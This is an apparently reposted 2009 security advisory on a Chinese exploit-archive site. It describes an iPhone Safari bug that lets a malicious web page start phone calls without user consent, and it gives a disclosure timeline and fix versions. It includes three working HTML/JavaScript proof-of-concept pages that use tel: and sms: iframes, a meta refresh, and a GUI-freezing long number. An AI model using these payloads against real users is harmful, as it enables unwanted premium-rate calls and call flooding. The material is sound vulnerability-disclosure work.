首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Safari on the Apple iPhone suffers from a vulnerability that allows an attacker
来源:collin.mulliner[at]sit.fraunhofer.de 作者:Mulliner 发布时间:2009-06-22  
Released since Apple published the iPhone 3.0 security fixes.

Vulnerability Report

--- BEGIN ADVISORY ---

Manufacturer: Apple (www.apple.com)
Device:       iPhone 3G (iPhone 1st Gen)
Firmware:     2.1 (possible earlier versions)
Device Type:  smart phone

Subsystems: Safari (and mobile telephony)

-----------------------------

Short name:
   iPhone Safari phone-auto-dial (vulnerability)

Vulnerability class:
   application logic bug

Executive Summary:
   A malicious website can initiate a phone call without the need of user
   interaction. The destination phone number is chosen by the attacker.

Risk: MEDIUM-HIGH
   Medium to high risk due to the possibility of financial gain through
   this attack by calling of premium rate numbers (e.g. 1-900 in the
   U.S.). Denial-of-service against arbitrary phone numbers through
   mass-calling. User cannot prevent attack.

-----------------------------

Reporter: Collin Mulliner <collin[AT]mulliner.org>

-----------------------------

Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)

-----------------------------

Time line:

   Oct. 20. 2008: Reported vulnerability to vendor.
   Oct. 20. 2008: Vendor acknowledges receiving our email.
                  Not commenting on the vulnerability itself.
   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
   Oct. 30. 2008: Sent additional information.
   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
                  version.
   Nov. 20. 2008: Public disclosure.
   Jun. 18. 2009: Full-Disclosure.

-----------------------------

Fix:

   iPhone OS 2.2
   iPhone OS 2.2.1
   iPhone OS 3.0
	
-----------------------------

Technical Details:

   The Safari version running on the iPhone supports handling the TEL [1]
   protocol through launching the telephony/dialer application. This is
   done by passing the provided phone number to the telephony
   application. Under normal conditions, loading a tel: URI results in a
   message box asking the user's permission to call the given number. The
   user is presented with the simple choice to either press call or
   cancel.

   A TEL URI can be opened automatically if the TEL URI is used as the
   source of an HTML iframe or frame, as the URL of a meta refresh, as
   the location of a HTTP 30X redirect, and as the location of the
   current or a new window using javascript.

   We discovered a security vulnerability that dismisses the "ask for
   permission to call" dialog in a way that chooses the "call" option
   rather than the "cancel" option.
	
   This condition occurs if a TEL URI is activated at the same time
   Safari is closed by launching an external application, for example
   launching the SMS application (in order to handle a SMS URI [2]). The
   SMS application can be launched through placing a SMS URI as the
   source of an iframe. This is shown in the first proof-of-concept
   exploit below.
	
   Further investigation showed that this behavior can be reproduced by
   launching other applications such as: Maps, YouTube, and iTunes.
   Launching these applications can be achieved through loading special
   URLs using the meta refresh tag. This is shown in the second
   proof-of-concept exploit below.

   We also discovered that the bug can also be triggered through popup
   windows (e.g. javascript alert). In this situation the initiating app
   does not need to be termianted in order to active the call.
	
   Finally, we discovered a second bug that can be used to perform
   malicious phone calls that cannot be prevented or canceled by the
   victim. This bug allows the attacker to freez the GUI (graphical user
   interface) for a number of seconds. While the GUI is frozen the call
   progresses in	the background and cannot be stopped by the victim user.
   Freezing the GUI is achieved by passing a "very long" phone number to
   the SMS application. The SMS application, immediately after being
   started, freezes the iPhone GUI. Also switching off the iPhone cannot
   be performed fast enough in order to prevent the malicious call.
	

   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04

-----------------------------

Further Discussion:

   The dialing dialog is clearly shown to the user also the user, in most
   cases, can't press cancel quick enough in order to stop the initiation
   of the call. Once the external application is launched, the telephony
   application is running in the background performing the call. Only
   the call forwarding dialog (containing the "dismiss" button) indicates
   a call being made.

-----------------------------

Proof-of-Concept with plain HTML using the SMS application:

   <html>
   <head>
   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
   </title>
   </head>
   <body>
   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
   <!-- second iframe is to attack quick users who manage to close the
        first call-dialog //-->
   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
   </body>
   </html>

Proof-of-Concept using javascript and the Maps application:

   <html>
   <head>
   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
   </title>
   <meta http-equiv="refresh" content="0;
   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
   </head>
   <body>
   <script lang=javascript>
   function a() {
    document.write("<iframe src=\"tel:+14089748388\" WIDTH=50 
HEIGHT=10></iframe>");
   }
   setTimeout("a()", 100);
   </script>
   </body>
   </html>
	
Proof-of-Concept attack where the victim user cannot stop the malicious 
phone call:

   <html>
   <head>
   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
   </title>
   </head>
   <body>
   <script lang=javascript>
   l = "<iframe src=\"sms:";
   for (i = 0; i < 10000; i++) {
           l = l + "3340948034298232";
   }
   l = l + "\" width=10 height=10></iframe><iframe
   src=\"tel:+14089748388\" height=10 width=10></iframe>";
   document.write(l);
   </script>
   </body>
   </html>

-----------------------------

More Detailed Information:

  Demo video available at:
   http://www.mulliner.org/iphone/

  Advisories:
   http://www.mulliner.org/security/advisories/

--- END ADVISORY ---


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
does!

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP version 5.2.10 has an inva
·NetBSD/x86 kill all processes
·PEEL E-Commerce suffers from a
·Multiple Exploiting IE8/IE7 XS
·Edraw PDF Viewer Component < 3
·DESlock+ 4.0.2 dlpcrypt.sys Lo
·compface <= 1.5.2 (XBM File) L
·Safari 3.2.3 Arbitrary Code Ex
·FretsWeb 1.2 (name) Remote Bli
·pmaPWN! - phpMyAdmin Code Inje
·Multiple HTTP Server Low Bandw
·Multiple HTTP Server Low Bandw
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved